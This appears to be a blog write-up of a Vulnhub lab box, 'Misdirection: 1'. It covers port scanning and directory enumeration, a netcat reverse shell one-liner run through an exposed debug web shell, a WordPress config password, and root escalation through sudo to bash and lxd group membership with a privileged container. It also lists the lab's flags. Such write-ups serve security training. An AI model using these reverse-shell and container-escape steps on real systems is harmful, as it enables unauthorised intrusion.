Vulnhub | Misdirection: 1

In this post, we will take a look at the steps I took to completely compromise the "Misdirection: 1" host from Vulnhub.

2 months ago   •   7 min read

By 0xBEN
Table of contents

Nmap Results

# Nmap 7.92 scan initiated Wed Jun 15 23:47:44 2022 as: nmap -T5 -p22,80,3306,8080 -A -oA scan-all 10.9.9.47
Nmap scan report for misdirection.cyber.range (10.9.9.47)
Host is up (0.00048s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ec:bb:44:ee:f3:33:af:9f:a5:ce:b5:77:61:45:e4:36 (RSA)
|   256 67:7b:cb:4e:95:1b:78:08:8d:2a:b1:47:04:8d:62:87 (ECDSA)
|_  256 59:04:1d:25:11:6d:89:a3:6c:6d:e4:e3:d2:3c:da:7d (ED25519)
80/tcp   open  http    Rocket httpd 1.2.6 (Python 2.7.15rc1)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Rocket 1.2.6 Python/2.7.15rc1
3306/tcp open  mysql   MySQL (unauthorized)
8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.29 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc|firewall
Running (JUST GUESSING): Linux 4.X|3.X|2.6.X|5.X (97%), Synology DiskStation Manager 5.X (88%), WatchGuard Fireware 11.X (88%)
OS CPE: cpe:/o:linux:linux_kernel:4.4 cpe:/o:linux:linux_kernel:3.13 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:5.1 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:linux:linux_kernel cpe:/o:watchguard:fireware:11.8
Aggressive OS guesses: Linux 4.4 (97%), Linux 3.13 (96%), Linux 2.6.32 (95%), Linux 4.0 (95%), Linux 3.10 - 4.11 (93%), Linux 3.11 - 4.1 (93%), Linux 3.2 - 4.9 (93%), Linux 5.1 (93%), Linux 2.6.32 or 3.10 (93%), Linux 3.10 - 3.12 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT     ADDRESS
1   0.24 ms pfSense.cyber.range (10.0.0.1)
2   0.37 ms misdirection.cyber.range (10.9.9.47)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun 15 23:48:03 2022 -- 1 IP address (1 host up) scanned in 19.21 seconds





Service Enumeration

TCP/80

gobuster dir -u http://misdirection.cyber.range -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php,html -o gobuster-out.txt -b 400,404
-b 400,404 to remove false-positives
/admin                (Status: 200) [Size: 42]
/examples             (Status: 200) [Size: 6937]
/init                 (Status: 200) [Size: 5782]
/server-status        (Status: 403) [Size: 312]
/welcome              (Status: 200) [Size: 13705]



TCP/8080

gobuster dir -u http://misdirection.cyber.range:8080 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php,html -o gobuster-out.txt

/.htaccess.php        (Status: 403) [Size: 314]
/.htpasswd            (Status: 403) [Size: 310]
/.htaccess.html       (Status: 403) [Size: 315]
/.htpasswd.php        (Status: 403) [Size: 314]
/.htaccess            (Status: 403) [Size: 310]
/.htpasswd.html       (Status: 403) [Size: 315]
/css                  (Status: 301) [Size: 341] [--> http://misdirection.cyber.range:8080/css/]
/debug                (Status: 301) [Size: 343] [--> http://misdirection.cyber.range:8080/debug/]
/development          (Status: 301) [Size: 349] [--> http://misdirection.cyber.range:8080/development/]
/help                 (Status: 301) [Size: 342] [--> http://misdirection.cyber.range:8080/help/]
/images               (Status: 301) [Size: 344] [--> http://misdirection.cyber.range:8080/images/]
/index.html           (Status: 200) [Size: 10918]
/js                   (Status: 301) [Size: 340] [--> http://misdirection.cyber.range:8080/js/]
/manual               (Status: 301) [Size: 344] [--> http://misdirection.cyber.range:8080/manual/]
/scripts              (Status: 301) [Size: 345] [--> http://misdirection.cyber.range:8080/scripts/]
/server-status        (Status: 403) [Size: 314]
/shell                (Status: 301) [Size: 343] [--> http://misdirection.cyber.range:8080/shell/]
/wordpress            (Status: 301) [Size: 347] [--> http://misdirection.cyber.range:8080/wordpress/]

/debug

I am able to obtain a reverse shell on the /debug page using a netcat listener and netcat on the box.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.2 443 >/tmp/f





Exploit

Globally open debug shell on the web server allows an unauthenticated attacker command execution on the host.





Post-Exploit Enumeration

Current User

Click to expand
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Matching Defaults entries for www-data on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on localhost:
    (brexit) NOPASSWD: /bin/bash



OS & Kernel

Click to expand
NAME="Ubuntu"
VERSION="18.04.2 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.2 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
    
Linux misdirection 4.15.0-50-generic #54-Ubuntu SMP Mon May 6 18:46:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux



Users

Click to expand
brexit:x:1000:1000:brexit:/home/brexit:/bin/bash



Groups

Click to expand
brexit:x:1000:



Network

Interfaces
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
    link/ether 0e:89:fa:6a:08:b5 brd ff:ff:ff:ff:ff:ff


ARP Table
N/A


Routes
N/A


Open Ports
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::8080                 :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   


Ping Sweep
N/A



Processes

Click to expand
brexit     538  0.0  0.0   4628   772 ?        Ss   Jul19   0:00 /bin/sh -c /home/brexit/start-vote.sh
brexit     546  0.0  0.1  11592  3180 ?        S    Jul19   0:00 /bin/bash /home/brexit/start-vote.sh
brexit     563  0.1  1.9 711916 40140 ?        Sl   Jul19   0:01 python /home/brexit/web2py/web2py.py -a <recycle>



Scheduled Tasks

Click to expand
None



Interesting Files

/var/www/html/wordpress/wp-config.php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wp_myblog' );

/** MySQL database username */
define( 'DB_USER', 'blog' );

/** MySQL database password */
define( 'DB_PASSWORD', 'abcdefghijklmnopqrstuv' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );





Privilege Escalation

Lateral Pivot

www-user has privileges to run passwordless sudo on /bin/bash as the user brexit. Upon lateral pivot to the brexit user, I ran the ID command to check for any specific group memberships.

One thing sticks out to me here, brexit is a member of the lxd group. That triggered a memory from another box I had done. Fortunately, I keep nondescript notes of various challenges I have done for future reference. This is why notes are important!

Web 4 | 0xBEN - Notes & Cheat Sheets
Web 31: Ladon Web SOAP APITarget: LinuxFoothold: File Inclusion via XXE Exploit DB: https://www.e...
Entry web 34 is the box where I noted the LXD privilege escalation vector

Key Differences

  • This box does not have any preinstalled images
  • We cannot sudo to do the lxd-alpine-builder as shown in the HackTricks guide
  • We will have to download a pre-built image import manually
  • This box is behind my firewall and does not have access to the Internet





Root Privilege Escalation

Download the Linux Container Image on Kali

Linux container image builds can be found here: https://us.lxd.images.canonical.com/images. I decided to go with the Alpine Linux image, since that's the one used in my notes.

Back on Kali, I recursively download the image files:

wget --no-parent -r https://us.lxd.images.canonical.com/images/alpine/3.15/amd64/default/20220720_13:00/
cd us.lxd.images.canonical.com/images/alpine/3.15/amd64/default/20220720_13:00/
find . -name '*html*' -delete
tar -cvf alpine.tar ./*

Transfer to the Target

Start a web server to transfer the image to the target:

sudo python3 -m http.server 80

On the target, download the alpine.tar file from Kali and extract:

wget http://kali.cyber.range/alpine.tar
mkdir alpine
tar -xvf alpine.tar -C alpine
cd alpine

Import the Container Image Manually

lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list
lxd init
lxc init alpine alpinect -c security.privileged=true
lxc config device add alpinect pwndisk disk source=/ path=/mnt/root recursive=true
lxc start alpinect
lxc exec alpinect /bin/sh
Note: when running lxd init, just press Enter multiple times to use the defaults
The host's disk is mounted at /mnt/root





Flags

Brexit
404b9193154be7fbbc56d7534cb26339


Root
0d2c6222bfdd3701e0fa12a9a9dc9c8c

Spread the word

Keep reading